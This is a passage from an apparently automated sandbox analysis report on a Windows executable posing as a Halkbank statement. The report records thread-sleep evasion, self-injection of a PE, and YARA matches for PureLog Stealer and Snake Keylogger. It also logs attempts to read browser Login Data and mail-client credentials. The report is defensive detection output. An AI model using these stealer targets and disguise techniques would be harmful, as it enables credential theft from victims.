                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 596310Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 596197Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 596079Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595954Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595591Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595366Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595196Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595079Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594954Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594829Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594704Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593610Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593485Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 592961Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591563Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591422Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591313Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591188Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591063Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 590938Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeWindow / User API: threadDelayed 3219Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeWindow / User API: threadDelayed 6567Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 1684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 2828Thread sleep count: 3219 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 2828Thread sleep count: 6567 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -597985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -597860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -597735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -596310s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -596197s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -596079s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -595954s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -595813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -595703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -595591s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -595484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -595366s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -595196s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -595079s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -594954s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -594829s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -594704s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -594594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -594469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -593860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -593735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -593610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -593485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -593360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -593235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -593110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -592961s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -591563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -591422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -591313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -591188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -591063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -590938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599610Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599485Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 596310Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 596197Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 596079Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595954Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595591Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595366Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595196Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595079Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594954Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594829Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594704Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593610Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593485Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 592961Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591563Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591422Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591313Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591188Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591063Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 590938Jump to behavior
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3220287888.0000000000C87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662BE28 LdrInitializeThunk,3_2_0662BE28
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory written: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27964d0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.29803a8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.29823c0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.297f390.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2002086129.0000000006C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1980117407.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1980117407.0000000002813000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
